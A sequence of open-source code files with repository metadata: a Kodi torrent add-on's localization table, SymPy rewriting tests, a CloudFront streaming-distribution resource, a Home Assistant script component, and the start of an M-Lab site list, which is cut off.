'Вилучити', 'Remove with files': 'Вилучити з файлами', 'Play File': 'Відтворити файл', 'Start All Files': 'Запустити всі файли', 'Stop All Files': 'Зупинити всі файли', 'Torrent-client Browser': 'Браузер торрент-клієнта', 'Remote Torrent-client': 'Віддалений торрент-клієнт', 'You didn\'t set up replacement path in setting.': 'Вы не налаштували заміну шляху.', 'For example /media/dl_torr/ to smb://SERVER/dl_torr/. Setup now?': 'Наприклад, /media/dl_torr/ на smb://SERVER/dl_torr/. Налаштувати?', 'Manual Torrent-client Path Edit': 'Змінити вручну каталог торрент-клієнта', 'Choose .torrent in video library': 'Виберіть .torrent у відеобібліотеці', '.torrent Player': '.torrent-програвач', 'Choose directory:': 'Виберіть каталог:', 'Starting download next episode!': 'Починається завантаження наступного епізоду!', 'Choose in torrent-client:': 'Оберіть роздачу:', 'Search Control Window': 'Вікно керування пошуком', 'Magnet-link (magnet:...)': 'Магнет-посилання (magnet:...)', 'Not a magnet-link!': 'Не є магнет-посиланням', 'Magnet-link Player': 'Програвач магнет-посилань', 'UNKNOWN STATUS': 'Невідомий стан', 'Checking preloaded files...': 'Перевірка файлів...', 'Waiting for website response...': 'Очікування відповіді сайту...', 'Search and cache information for:': 'Пошук і кешування інформації для:', 'Open Torrent': 'Відкрити список файлів', 'Torrent list is empty.': 'Список роздач порожній.', 'Content Lists': 'Списки медіа', 'Canceled by User': 'Скасовано користувачем', 'Do you want to search and cache full metadata + arts?': 'Бажаєте автоматично отримувати мета-дані та арти?', 'This vastly decreases load speed, but you will be asked to download premade bases!': 'Це суттєво знижує швидкість завантаження, але вам буде запропоновано завантажити готові бази!', 'Do you want to preload full metadata?': 'Бажаєте завантажити повні мета-дані?', 'It is highly recommended!': 'Наполегливо рекомендується погодитись!', 'TV Shows': 'Серіали', 'Cartoons': 'Мультфільми', 'Anime': 'Аніме', 'Most Recent': 'Гарячі новинки', 'Top 250 Movies': 'Найкращі 250 фільмів', 'Top All Time': 'Краще за весь час', 'by Genre': 'по Жанру', 'by Year': 'по Року', 'Action': 'Боєвики', 'Adventure': 'Пригоди', 'Animation': 'Анімація', 'Biography': 'Біографія', 'Comedy': 'Комедії', 'Crime': 'Детектив', 'Documentary': 'Документальне', 'Drama': 'Драми', 'Family': 'Сімейне', 'Fantasy': 'Фентезі', 'Film-Noir': 
'Нуар', 'History': 'Історичні', 'Horror': 'Жахи', 'Music': 'Музичні', 'Musical': 'М\'юзикли', 'Mystery': 'Містика', 'Romance': 'Мелодрами', 'Sci-Fi': 'Фантастика', 'Short': 'Короткометражки', 'Sport': 'Спортивні', 'Thriller': 'Трилери', 'War': 'Військові', 'Western': 'Вестерни', '[B]by Site[/B]': '[B]по Сайту[/B]', 'Cartoons Series': 'Мультсеріали', 'Cartoons Short': 'Мультфільми (короткометражки)', 'Male': 'Чоловічі', 'Female': 'Жіночі', 'Russia & USSR': 'Росія + СРСР', 'Next Page': 'Наступна сторінка', 'Previous Page': 'Попередня сторінка', 'Russian Movies': 'Вітчизняні фільми', 'Movies': 'Іноземні фільми', '3D Movies': 'Фильмы 3D', 'israeli Movies': 'израильские фильмы', 'hebdub movies': 'Фильмы на иврите', 'High Resolution Movies': 'высокое разрешение фильма', 'Movies [Bluray]': 'Фильмы [Blu-ray]', 'Anime Film': 'Повнометражні аніме', 'Anime Series': 'Аніме-серіали', 'Can\'t download torrent, probably no seeds available.': 'Не вдаєть завантажити торрент, мабуть, немає доступних сідів.', 'Personal List': 'Особистий список', 'Add to %s': 'Додати в %s', 'Delete from %s': 'Вилучити из %s', 'Added!': 'Додано', 'Deleted!': 'Вилучено!', 'Search History': 'Історія пошуку', 'Favourites': 'Вибране', 'Favourites SH': 'Вибране SH', 'Clear %s': 'Очистити %s', 'Clear!': 'Очищено!', 'kb/s': 'Кб/с', 'Queued': 'В черзі', 'Checking': 'Перевірка', 'Downloading metadata': 'Завантаження мета-даних', 'Downloading': 'Завантаження', 'Finished': 'Завершено', 'Seeding': 'Роздача (сідування)', 'Allocating': 'Виділення', 'Allocating file & Checking resume': 'Виділення файлу і перевірка резюме', 'For Kids': 'Дитяче', 'Adult': 'Еротика', 'Does not support magnet links!': 'Не підтримує магнет-посилання!', 'Reset All Cache DBs': 'Зкинути усі закешовані бази', '[B]Search[/B]': '[B]Пошук[/B]', 'You can always restart this by deleting DBs via Context Menu': 'Ви завжди можете перезапустити, вилучивши бази через контекстне меню', 'Your preloaded databases are outdated!': 'Ваші завантажені бази мета-даних застаріли!', 'Do you want to download new ones right now?': 'Бажаєте завантажити нові прямо зараз?', 'Individual Tracker Options':'Вибір трекерів', 'Downloading and copy subtitles. Please wait.':'Завантаження та копіювання субтитрів. Будь ласка, зачекайте.', 'International Check - First Run':'Міжнародна перевірка - перший запуск', 'Delete Russian stuff?':'Вилучити російські трекери?', 'Save to path':'Зберегти в каталог', 'Return Russian stuff':'Повернути російські трекери', '%d files have been returned':'%d файлів повернуто', 'Download via T-client':'Завантажити торрент-клієнтом', 'Download via Libtorrent':'Завантажити Libtorrent\'ом', 'Download Status':'Статус завантаження', 'Download has not finished yet':'Завантаження не завершене', 'Stopped and Deleted!':'Зупинено та Вилучено!', 'Unpaused!':'Відновлено!', 'Paused!':'Призупинено!', 'Stopped!':'Зупинено!', 'Started!':'Запущено!', 'Delete and Stop':'Вилучити та зупинити', 'Unpause':'Відновити', 'Pause':'Пауза', 'Delete':'Видалити', 'Open (no return)':'Відкрити (без повернення)', 'Torrent is seeding. To stop it use Download Status.':'Сідування. 
Для зупинки використовуйте Статус завантаження.', 'Start All':'Запустити все', 'Started All!':'Все запущене!', 'Stopped All!':'Все зупинене!', 'Stop All':'Зупинити все', 'Keyboard':'Клавіатура', 'Copy Files in Root':'Зкопіювати файли в корінь', 'Copied %d files!':'Зкопійовано %d файлів!', 'Return to %s':'Повернутись в %s', 'Search results:':'Результати пошуку:', 'by Seeders':'по сідам', 'by Date':'по даті', 'Sort':'сортування', 'Close':'Закрити вікно', 'Views:':'Перегляди.:', 'Rating:':'Рейтинг:', 'Information not found!':'Інформація не знайдена!', 'Choose searcher':'Оберіть трекер', 'python-libtorrent Not Found':'python-libtorrent не знайдено', 'Windows has static compiled python-libtorrent included.':'На Windows при встановленні з репозиторію разом з плагіном йде python-libtorrent.', 'You should install "script.module.libtorrent" from "MyShows.me Kodi Repo"':'Встановіть "script.module.libtorrent" з "MyShows.me Kodi Repo"', 'Linux x64 has not static compiled python-libtorrent included.':'На Linux x64 не змогли зібрати статичну версію python-libtorrent', 'You should install it by "sudo apt-get install python-libtorrent"':'Встановіть командою "sudo apt-get install python-libtorrent"', 'Linux has static compiled python-libtorrent included but it didn\'t work.':'На Linux x86 є статична версія python-libtorrent, але вона не спрацювала.', 'As far as I know you can compile python-libtorrent for ARMv6-7.':'На ARMv6-7 можно скомпілювати python-libtorrent', 'You should search for "OneEvil\'s OpenELEC libtorrent" or use Ace Stream.':'Пошукайте "OneEvil\'s OpenELEC libtorrent" або використовуйте Ace Stream', 'Please use install Ace Stream APK and choose it in Settings.':'Встановіть Ace Stream APK і оберіть плеєр в Налаштуваннях', 'It is possible to compile python-libtorrent for Android, but I don\'t know how.':'Скомпілювати python-libtorrent на Android можливо, але ми не знаємо як.', 'It is possible to compile python-libtorrent for OS X.':'Скомпілювати python-libtorrent на OS X можливо.', 'But you would have to do it by yourself, there is some info on github.com.':'Але це доведеться робити самому, на гітхабі була інформація', 'It is NOT possible to compile python-libtorrent for iOS.':'Під iOS неможливо скомпілювати python-libtorrent', 'But you can use torrent-client control functions.':'Але всі решта функцій, крім прямого стрімінгу, працюють.', } } try: return dictionary[language][text] except: if language=='uk': try: return dictionary['ru'][text] except: return text else: return text
chimkentec/KodiMODo_rep
plugin.video.torrenter/Localization.py
Python
gpl-3.0
56,942
0.008658
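Localization.py above resolves a display string through a per-language dictionary, with Ukrainian falling back to Russian and finally to the English key itself. A self-contained reduction of that lookup order (toy dictionary, not the add-on's real tables):

dictionary = {
    'ru': {'Search': 'Поиск'},
    'uk': {},  # no Ukrainian entry -> fall back to 'ru'
}

def localize(text, language='uk'):
    try:
        return dictionary[language][text]
    except KeyError:
        if language == 'uk':
            return dictionary['ru'].get(text, text)
        return text

print(localize('Search'))  # Поиск
print(localize('Close'))   # Close (untranslated keys pass through unchanged)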
# -*- coding: utf-8 -*- from __future__ import (absolute_import, division, print_function) from sympy import log, exp, Symbol, Pow, sin from sympy.printing.ccode import ccode from sympy.codegen.cfunctions import log2, exp2, expm1, log1p from sympy.codegen.rewriting import ( optimize, log2_opt, exp2_opt, expm1_opt, log1p_opt, optims_c99, create_expand_pow_optimization ) from sympy.utilities.pytest import XFAIL def test_log2_opt(): x = Symbol('x') expr1 = 7*log(3*x + 5)/(log(2)) opt1 = optimize(expr1, [log2_opt]) assert opt1 == 7*log2(3*x + 5) assert opt1.rewrite(log) == expr1 expr2 = 3*log(5*x + 7)/(13*log(2)) opt2 = optimize(expr2, [log2_opt]) assert opt2 == 3*log2(5*x + 7)/13 assert opt2.rewrite(log) == expr2 expr3 = log(x)/log(2) opt3 = optimize(expr3, [log2_opt]) assert opt3 == log2(x) assert opt3.rewrite(log) == expr3 expr4 = log(x)/log(2) + log(x+1) opt4 = optimize(expr4, [log2_opt]) assert opt4 == log2(x) + log(2)*log2(x+1) assert opt4.rewrite(log) == expr4 expr5 = log(17) opt5 = optimize(expr5, [log2_opt]) assert opt5 == expr5 expr6 = log(x + 3)/log(2) opt6 = optimize(expr6, [log2_opt]) assert str(opt6) == 'log2(x + 3)' assert opt6.rewrite(log) == expr6 def test_exp2_opt(): x = Symbol('x') expr1 = 1 + 2**x opt1 = optimize(expr1, [exp2_opt]) assert opt1 == 1 + exp2(x) assert opt1.rewrite(Pow) == expr1 expr2 = 1 + 3**x assert expr2 == optimize(expr2, [exp2_opt]) def test_expm1_opt(): x = Symbol('x') expr1 = exp(x) - 1 opt1 = optimize(expr1, [expm1_opt]) assert expm1(x) - opt1 == 0 assert opt1.rewrite(exp) == expr1 expr2 = 3*exp(x) - 3 opt2 = optimize(expr2, [expm1_opt]) assert 3*expm1(x) == opt2 assert opt2.rewrite(exp) == expr2 expr3 = 3*exp(x) - 5 assert expr3 == optimize(expr3, [expm1_opt]) expr4 = 3*exp(x) + log(x) - 3 opt4 = optimize(expr4, [expm1_opt]) assert 3*expm1(x) + log(x) == opt4 assert opt4.rewrite(exp) == expr4 expr5 = 3*exp(2*x) - 3 opt5 = optimize(expr5, [expm1_opt]) assert 3*expm1(2*x) == opt5 assert opt5.rewrite(exp) == expr5 @XFAIL def test_expm1_two_exp_terms(): x, y = map(Symbol, 'x y'.split()) expr1 = exp(x) + exp(y) - 2 opt1 = optimize(expr1, [expm1_opt]) assert opt1 == expm1(x) + expm1(y) def test_log1p_opt(): x = Symbol('x') expr1 = log(x + 1) opt1 = optimize(expr1, [log1p_opt]) assert log1p(x) - opt1 == 0 assert opt1.rewrite(log) == expr1 expr2 = log(3*x + 3) opt2 = optimize(expr2, [log1p_opt]) assert log1p(x) + log(3) == opt2 assert (opt2.rewrite(log) - expr2).simplify() == 0 expr3 = log(2*x + 1) opt3 = optimize(expr3, [log1p_opt]) assert log1p(2*x) - opt3 == 0 assert opt3.rewrite(log) == expr3 expr4 = log(x+3) opt4 = optimize(expr4, [log1p_opt]) assert str(opt4) == 'log(x + 3)' def test_optims_c99(): x = Symbol('x') expr1 = 2**x + log(x)/log(2) + log(x + 1) + exp(x) - 1 opt1 = optimize(expr1, optims_c99).simplify() assert opt1 == exp2(x) + log2(x) + log1p(x) + expm1(x) assert opt1.rewrite(exp).rewrite(log).rewrite(Pow) == expr1 expr2 = log(x)/log(2) + log(x + 1) opt2 = optimize(expr2, optims_c99) assert opt2 == log2(x) + log1p(x) assert opt2.rewrite(log) == expr2 expr3 = log(x)/log(2) + log(17*x + 17) opt3 = optimize(expr3, optims_c99) delta3 = opt3 - (log2(x) + log(17) + log1p(x)) assert delta3 == 0 assert (opt3.rewrite(log) - expr3).simplify() == 0 expr4 = 2**x + 3*log(5*x + 7)/(13*log(2)) + 11*exp(x) - 11 + log(17*x + 17) opt4 = optimize(expr4, optims_c99).simplify() delta4 = opt4 - (exp2(x) + 3*log2(5*x + 7)/13 + 11*expm1(x) + log(17) + log1p(x)) assert delta4 == 0 assert (opt4.rewrite(exp).rewrite(log).rewrite(Pow) - expr4).simplify() == 0 expr5 = 
3*exp(2*x) - 3 opt5 = optimize(expr5, optims_c99) delta5 = opt5 - 3*expm1(2*x) assert delta5 == 0 assert opt5.rewrite(exp) == expr5 expr6 = exp(2*x) - 3 opt6 = optimize(expr6, optims_c99) delta6 = opt6 - (exp(2*x) - 3) assert delta6 == 0 expr7 = log(3*x + 3) opt7 = optimize(expr7, optims_c99) delta7 = opt7 - (log(3) + log1p(x)) assert delta7 == 0 assert (opt7.rewrite(log) - expr7).simplify() == 0 expr8 = log(2*x + 3) opt8 = optimize(expr8, optims_c99) assert opt8 == expr8 def test_create_expand_pow_optimization(): my_opt = create_expand_pow_optimization(4) x = Symbol('x') assert ccode(optimize(x**4, [my_opt])) == 'x*x*x*x' x5x4 = x**5 + x**4 assert ccode(optimize(x5x4, [my_opt])) == 'pow(x, 5) + x*x*x*x' sin4x = sin(x)**4 assert ccode(optimize(sin4x, [my_opt])) == 'pow(sin(x), 4)'
wxgeo/geophar
wxgeometrie/sympy/codegen/tests/test_rewriting.py
Python
gpl-2.0
4,843
0.000413
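test_rewriting.py above exercises sympy.codegen.rewriting. A short sketch of the typical end use, turning a SymPy expression into C99-friendly code with the same optims_c99 pipeline; the printed output in the comment is indicative, not guaranteed verbatim across SymPy versions.

from sympy import Symbol, exp, log
from sympy.printing.ccode import ccode
from sympy.codegen.rewriting import optimize, optims_c99

x = Symbol('x')
expr = 2**x + log(x)/log(2) + exp(x) - 1
print(ccode(optimize(expr, optims_c99)))  # e.g. "exp2(x) + expm1(x) + log2(x)"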
# Copyright 2014-2015 Isotoma Limited # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import uuid from touchdown.core.resource import Resource from touchdown.core.plan import Plan, Present from touchdown.core import argument, serializers from ..account import BaseAccount from ..common import SimpleDescribe, SimpleApply, SimpleDestroy, RefreshMetadata from ..s3 import Bucket from .. import route53 from .common import CloudFrontList class StreamingLoggingConfig(Resource): resource_name = "streaming_logging_config" dot_ignore = True enabled = argument.Boolean(field="Enabled", default=False) bucket = argument.Resource(Bucket, field="Bucket", serializer=serializers.Default(default=None), default="") prefix = argument.String(field="Prefix", default="") class StreamingDistribution(Resource): resource_name = "streaming_distribution" extra_serializers = { "CallerReference": serializers.Expression( lambda runner, object: runner.get_plan(object).object.get('StreamingDistributionConfig', {}).get('CallerReference', str(uuid.uuid4())) ), "Aliases": CloudFrontList(serializers.Chain( serializers.Context(serializers.Argument("cname"), serializers.ListOfOne(maybe_empty=True)), serializers.Context(serializers.Argument("aliases"), serializers.List()), )), "TrustedSigners": serializers.Const({ "Enabled": False, "Quantity": 0, }), "S3Origin": serializers.Resource(group="s3origin"), } name = argument.String() cname = argument.String(default=lambda instance: instance.name) comment = argument.String(field='Comment', default=lambda instance: instance.name) aliases = argument.List() enabled = argument.Boolean(default=True, field="Enabled") bucket = argument.Resource( Bucket, field="DomainName", serializer=serializers.Format("{0}.s3.amazonaws.com", serializers.Identifier()), group="s3origin" ) origin_access_identity = argument.String(default='', field="OriginAccessIdentity", group="s3origin") logging = argument.Resource( StreamingLoggingConfig, default=lambda instance: dict(enabled=False), field="Logging", serializer=serializers.Resource(), ) price_class = argument.String( default="PriceClass_100", choices=['PriceClass_100', 'PriceClass_200', 'PriceClass_All'], field="PriceClass", ) account = argument.Resource(BaseAccount) class Describe(SimpleDescribe, Plan): resource = StreamingDistribution service_name = 'cloudfront' describe_filters = {} describe_action = "list_streaming_distributions" describe_envelope = 'StreamingDistributionList.Items' key = 'Id' def get_describe_filters(self): return {"Id": self.object['Id']} def describe_object_matches(self, d): return self.resource.name == d['Comment'] or self.resource.name in d['Aliases'].get('Items', []) def describe_object(self): distribution = super(Describe, self).describe_object() if distribution: result = self.client.get_streaming_distribution(Id=distribution['Id']) distribution = {"ETag": result["ETag"], "Id": distribution["Id"]} distribution.update(result['StreamingDistribution']) return distribution class Apply(SimpleApply, Describe): create_action = 
"create_streaming_distribution" create_response = "not-that-useful" waiter = "streaming_distribution_deployed" signature = ( Present("name"), Present("bucket"), ) def get_create_serializer(self): return serializers.Dict( StreamingDistributionConfig=serializers.Resource(), ) class Destroy(SimpleDestroy, Describe): destroy_action = "delete_streaming_distribution" def get_destroy_serializer(self): return serializers.Dict( Id=self.resource_id, IfMatch=serializers.Property('ETag'), ) def destroy_object(self): if not self.object: return if self.object['StreamingDistributionConfig'].get('Enabled', False): yield self.generic_action( "Disable streaming distribution", self.client.update_streaming_distribution, Id=self.object['Id'], IfMatch=self.object['ETag'], StreamingDistributionConfig=serializers.Resource( Enabled=False, ), ) yield self.get_waiter( ["Waiting for streaming distribution to enter disabled state"], "streaming_distribution_deployed", ) yield RefreshMetadata(self) for change in super(Destroy, self).destroy_object(): yield change class AliasTarget(route53.AliasTarget): """ Adapts a StreamingDistribution into a AliasTarget """ input = StreamingDistribution def get_serializer(self, runner, **kwargs): return serializers.Context( serializers.Const(self.adapts), serializers.Dict( DNSName=serializers.Context( serializers.Property("DomainName"), serializers.Expression(lambda r, o: route53._normalize(o)), ), HostedZoneId="Z2FDTNDATAQYW2", EvaluateTargetHealth=False, ) )
mitchellrj/touchdown
touchdown/aws/cloudfront/streaming_distribution.py
Python
apache-2.0
6,002
0.001666
""" homeassistant.components.script ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Scripts are a sequence of actions that can be triggered manually by the user or automatically based upon automation events, etc. """ import logging from datetime import timedelta import homeassistant.util.dt as date_util import threading from homeassistant.helpers.event import track_point_in_time from homeassistant.util import split_entity_id from homeassistant.const import ( STATE_ON, STATE_OFF, SERVICE_TURN_ON, SERVICE_TURN_OFF, EVENT_TIME_CHANGED) DOMAIN = "script" DEPENDENCIES = ["group"] CONF_ALIAS = "alias" CONF_SERVICE = "execute_service" CONF_SERVICE_DATA = "service_data" CONF_SEQUENCE = "sequence" CONF_DELAY = "delay" _LOGGER = logging.getLogger(__name__) def setup(hass, config): """ Load the scripts from the configuration. """ scripts = [] for name, cfg in config[DOMAIN].items(): if CONF_SEQUENCE not in cfg: _LOGGER.warn("Missing key 'sequence' for script %s", name) continue alias = cfg.get(CONF_ALIAS, name) entity_id = "{}.{}".format(DOMAIN, name) script = Script(hass, entity_id, alias, cfg[CONF_SEQUENCE]) hass.services.register(DOMAIN, name, script) scripts.append(script) def turn_on(service): """ Calls a script. """ for entity_id in service.data['entity_id']: domain, service = split_entity_id(entity_id) hass.services.call(domain, service, {}) def turn_off(service): """ Cancels a script. """ for entity_id in service.data['entity_id']: for script in scripts: if script.entity_id == entity_id: script.cancel() hass.services.register(DOMAIN, SERVICE_TURN_ON, turn_on) hass.services.register(DOMAIN, SERVICE_TURN_OFF, turn_off) return True class Script(object): # pylint: disable=attribute-defined-outside-init # pylint: disable=too-many-instance-attributes # pylint: disable=too-few-public-methods """ A script contains a sequence of service calls or configured delays that are executed in order. Each script also has a state (on/off) indicating whether the script is running or not. """ def __init__(self, hass, entity_id, alias, sequence): self.hass = hass self.alias = alias self.sequence = sequence self.entity_id = entity_id self._lock = threading.Lock() self._reset() def cancel(self): """ Cancels a running script and resets the state back to off. """ _LOGGER.info("Cancelled script %s", self.alias) with self._lock: if self.listener: self.hass.bus.remove_listener(EVENT_TIME_CHANGED, self.listener) self.listener = None self._reset() def _reset(self): """ Resets a script back to default state so that it is ready to run from the start again. """ self.actions = None self.listener = None self.last_action = "Not Running" self.hass.states.set(self.entity_id, STATE_OFF, { "friendly_name": self.alias, "last_action": self.last_action }) def _execute_until_done(self): """ Executes a sequence of actions until finished or until a delay is encountered. If a delay action is encountered, the script registers itself to be called again in the future, when _execute_until_done will resume. Returns True if finished, False otherwise. """ for action in self.actions: if CONF_SERVICE in action: self._call_service(action) elif CONF_DELAY in action: delay = timedelta(**action[CONF_DELAY]) point_in_time = date_util.now() + delay self.listener = track_point_in_time( self.hass, self, point_in_time) return False return True def __call__(self, *args, **kwargs): """ Executes the script. 
""" _LOGGER.info("Executing script %s", self.alias) with self._lock: if self.actions is None: self.actions = (action for action in self.sequence) if not self._execute_until_done(): state = self.hass.states.get(self.entity_id) state.attributes['last_action'] = self.last_action self.hass.states.set(self.entity_id, STATE_ON, state.attributes) else: self._reset() def _call_service(self, action): """ Calls the service specified in the action. """ self.last_action = action.get(CONF_ALIAS, action[CONF_SERVICE]) _LOGGER.info("Executing script %s step %s", self.alias, self.last_action) domain, service = split_entity_id(action[CONF_SERVICE]) data = action.get(CONF_SERVICE_DATA, {}) self.hass.services.call(domain, service, data)
michaelarnauts/home-assistant
homeassistant/components/script.py
Python
mit
5,105
0
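For orientation on the script component record above: its setup(hass, config) walks a per-script mapping of sequences built from the CONF_* keys it defines. The dict below is a minimal sketch of that shape; the script name, services, entity ids and delay are hypothetical examples, not taken from the original record.

# Assumed configuration shape consumed by setup(hass, config) above.
example_config = {
    "script": {
        "wakeup": {
            "alias": "Wake up",
            "sequence": [
                {"execute_service": "light.turn_on",
                 "service_data": {"entity_id": "light.bedroom"}},
                {"delay": {"minutes": 5}},       # expanded via timedelta(**delay)
                {"execute_service": "light.turn_off",
                 "service_data": {"entity_id": "light.bedroom"}},
            ],
        }
    }
}
# setup(hass, example_config) would register a `script.wakeup` service that runs
# the two service calls with a five-minute pause between them.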
#!/usr/bin/python from planetlab.model import * from users import user_list # NOTE: The legacy network remap is used to re-order the automatically # generated, sequential list of ipaddresses to a legacy order to preserve # pre-existing slice-and-IP assignments. Otherwise, slices would be assigned # to new IPs, and for now, we wish to preserve the slice-node-ip mapping. # An appropriate time to remove this and re-assign IPs to slices would be # after a major update & reinstallation, such as LXC kernel update. legacy_network_remap = {} Network.legacy_network_remap = legacy_network_remap # name : site prefix, used to generate PL site name, hostnames, etc # net : v4 & v6 network prefixes and definitions. # The "arch" parameter of makesite() is a facility that PLC uses to pass the # correct kernel arguments when booting nodes at a given site. Currently defined # "arch" values are: # # i386 - none # x86_64 - "noapic acpi=off" # x86_64-r420 - "pci=nobios acpi=off" # x86_64-r630 - none site_list = [ makesite('akl01','163.7.129.0', '2404:138:4009::', 'Auckland', 'NZ', -36.850000, 174.783000, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('ams03','80.239.169.0', '2001:2030:32::', 'Amsterdam', 'NL', 52.308600, 4.763890, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('ams04','77.67.114.64', '2001:668:1f:5f::', 'Amsterdam', 'NL', 52.308600, 4.763890, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('ams05','195.89.145.0', '2001:5002:100:21::', 'Amsterdam', 'NL', 52.308600, 4.763890, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('ams08','213.244.128.128','2001:4c08:2003:2::', 'Amsterdam', 'NL', 52.308600, 4.763890, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('arn02','195.89.146.192', '2001:5012:100:24::', 'Stockholm', 'SE', 59.651900, 17.918600, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('arn03','213.242.86.64', '2001:4c08:2003:44::', 'Stockholm', 'SE', 59.651900, 17.918600, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('arn04','62.115.225.128', '2001:2030:0:38::', 'Stockholm', 'SE', 59.651900, 17.918600, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('arn05','77.67.119.64', '2001:668:1f:6a::', 'Stockholm', 'SE', 59.651900, 17.918600, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('ath03','193.201.166.128', '2001:648:25e0::', 'Athens', 'GR', 37.936400, 23.944400, user_list, count=4, arch='x86_64-r630', v6gw='2001:648:25e0::129', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('atl02','38.112.151.64', '2001:550:5b00:1::', 'Atlanta_GA', 'US', 33.636700, -84.428100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('atl03','64.86.200.192', '2001:5a0:3b02::', 'Atlanta_GA', 'US', 33.636700, -84.428100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('atl04','173.205.0.192', '2001:668:1f:1c::', 'Atlanta_GA', 'US', 33.636700, -84.428100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('atl07','209.170.91.128', '2001:2030:0:42::', 'Atlanta_GA', 'US', 33.636700, 
-84.428100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('atl08','4.71.254.128', '2001:1900:3001:c::', 'Atlanta_GA', 'US', 33.636700, -84.428100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('bcn01','91.213.30.192', '2001:67c:137c:5::', 'Barcelona', 'ES', 41.297445, 2.081105, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('beg01','188.120.127.0', '2001:7f8:1e:6::', 'Belgrade', 'RS', 44.821600, 20.292100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('bom01','125.18.112.64', '2404:a800:2000:217::', 'Mumbai', 'IN', 19.088611, 72.868056, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('bom02','14.143.58.128', '2403:0:100:66::', 'Mumbai', 'IN', 19.088611, 72.868056, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('bru01','195.89.146.128', '2001:5005:200::', 'Brussels', 'BE', 50.4974163, 3.3528346, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('bru02','212.3.248.192', '2001:4c08:2003:45::', 'Brussels', 'BE', 50.4974163, 3.3528346, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('bru03','62.115.229.192', '2001:2030:0:39::', 'Brussels', 'BE', 50.4974163, 3.3528346, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('bru04','77.67.119.0', '2001:668:1f:69::', 'Brussels', 'BE', 50.4974163, 3.3528346, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('cpt01','154.114.19.64', '2001:4200:0:e::', 'Cape_Town', 'ZA', -33.972387,18.601803, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('den02','4.34.58.0', '2001:1900:2200:49::', 'Denver_CO', 'US', 39.856100, -104.673700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('den04','128.177.109.64', '2001:438:fffd:2c::', 'Denver_CO', 'US', 39.856100, -104.673700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('den05','209.170.120.64', '2001:2030:0:3b::', 'Denver_CO', 'US', 39.856100, -104.673700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('dfw02','64.86.132.64', '2001:5a0:3f00::', 'Dallas_TX', 'US', 32.896900, -97.038100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('dfw03','4.15.35.128', '2001:1900:2200:44::', 'Dallas_TX', 'US', 32.896900, -97.038100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('dfw05','128.177.163.64', '2001:438:fffd:30::', 'Dallas_TX', 'US', 32.896900, -97.038100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('dfw07','209.170.119.128','2001:2030:0:1f::', 'Dallas_TX', 'US', 32.896900, -97.038100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('dfw08','38.107.216.0', '2001:550:2000::', 'Dallas_TX', 'US', 32.896900, -97.038100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('dub01','193.1.12.192', '2001:770:b5::', 'Dublin', 'IE', 
